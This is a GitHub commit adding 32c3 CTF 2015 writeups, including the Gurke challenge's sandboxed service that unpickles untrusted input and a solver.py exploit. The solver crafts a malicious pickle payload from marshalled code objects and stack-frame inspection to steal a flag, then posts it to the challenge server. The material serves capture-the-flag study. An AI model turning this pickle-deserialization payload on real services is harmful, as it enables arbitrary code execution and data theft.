Skip to content

Commit c361949

Browse files
PharisaeusPharisaeus
committed
added 32c3
1 parent d43478a commit c361949

File tree

5 files changed

+95
-0
lines changed

5 files changed

+95
-0
lines changed

2015-12-27-32c3/README.md

+11
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
# Writeup 32c3 CTF 2015
2+
3+
Uczestniczyliśmy (cr019283, c7f.m0d3, mnmd21891, msm, Rev, other019, nazywam i Shalom) w 32c3 CTF 2015, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy).
4+
5+
### Spis treści:
6+
* [Forth (Pwn) 150](forth_pwn_150)
7+
* [Teufel (Pwn) 200](teufel_pwn_200)
8+
* [HD44780 (Embedded) 150](hd44780_embedded_150)
9+
* [TinyHosting (Web) 250](tiny_hosting_web_250)
10+
* [Gurke (Misc) 300](gurke_misc_300)
11+

2015-12-27-32c3/gurke_misc_300/README.md

+7
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
##Gurke (Misc, 300p)
2+
3+
###PL
4+
[ENG](#eng-version)
5+
6+
7+
### ENG version

2015-12-27-32c3/gurke_misc_300/gurke.py

+48
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
#!/usr/bin/env python
2+
import sys
3+
import os
4+
5+
import socket
6+
import pickle
7+
import base64
8+
import marshal
9+
import types
10+
import inspect
11+
import encodings.string_escape
12+
13+
class Flag(object):
14+
def __init__(self):
15+
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16+
s.connect(("172.17.0.1", 1234))
17+
self.flag = s.recv(1024).strip()
18+
s.close()
19+
flag = Flag()
20+
21+
from seccomp import *
22+
23+
f = SyscallFilter(KILL)
24+
f.add_rule_exactly(ALLOW, "read")
25+
f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stdout.fileno()))
26+
f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stderr.fileno()))
27+
f.add_rule_exactly(ALLOW, "close")
28+
f.add_rule_exactly(ALLOW, "exit_group")
29+
30+
f.add_rule_exactly(ALLOW, "open", Arg(1, EQ, 0))
31+
f.add_rule_exactly(ALLOW, "stat")
32+
f.add_rule_exactly(ALLOW, "lstat")
33+
f.add_rule_exactly(ALLOW, "lseek")
34+
f.add_rule_exactly(ALLOW, "fstat")
35+
f.add_rule_exactly(ALLOW, "getcwd")
36+
f.add_rule_exactly(ALLOW, "readlink")
37+
f.add_rule_exactly(ALLOW, "mmap", Arg(3, MASKED_EQ, 2, 2))
38+
f.add_rule_exactly(ALLOW, "munmap")
39+
f.load()
40+
41+
data = os.read(0, 4096)
42+
try:
43+
res = pickle.loads(data)
44+
print 'res: %r\n' % res
45+
except Exception as e:
46+
print >>sys.stderr, "exception", repr(e)
47+
48+
os._exit(0)

2015-12-27-32c3/gurke_misc_300/solver.py

+28
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
import base64
2+
import marshal
3+
import requests
4+
5+
6+
def fun1(frames):
7+
return frames[3][0]
8+
9+
10+
def fun2(frames_data):
11+
return frames_data[-6][1]['flag'].flag
12+
13+
code1 = base64.b64encode(marshal.dumps(fun1.func_code))
14+
code2 = base64.b64encode(marshal.dumps(fun2.func_code))
15+
16+
17+
class Flag(object):
18+
def __init__(self):
19+
self.flag = 'test'
20+
21+
flag = Flag()
22+
data = "cos\nwrite\n(I1\nctypes\nFunctionType\n(cmarshal\nloads\n(cbase64\nb64decode\n(S'"+code2+"'\ntRtR(dS''\n))tR(cinspect\ngetmembers\n(ctypes\nFunctionType\n(cmarshal\nloads\n(cbase64\nb64decode\n(S'"+code1+"'\ntRtR(dS''\n(t(ttR(cinspect\ngetouterframes\n(cinspect\ncurrentframe\n)RtRtRtRtRtR."
23+
url = "http://136.243.194.43/"
24+
result = requests.post(url, data=data)
25+
print(result.text)
26+
# res = pickle.loads(data)
27+
# print('res: %r\n' % res)
28+

README.md

+1
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
# CTF writeups from P4 Team
22

3+
* [2015.12.27 **32c3 CTF 2015** (46th place / 389 teams)](2015-12-27-32c3)
34
* [2015.12.05 **SECCON CTF 2015** (12th place / 872 teams)](2015-12-05-seccon)
45
* [2015.11.28 **9447 Security Society CTF 2015** (21st place / 595 teams)](2015-11-28-9447)
56
* [2015.11.20 **Defcamp CTF Finals 2015** (11th place / 15 teams out of 378 teams)](2015-11-20-dctffinals)

0 commit comments

Comments
 (0)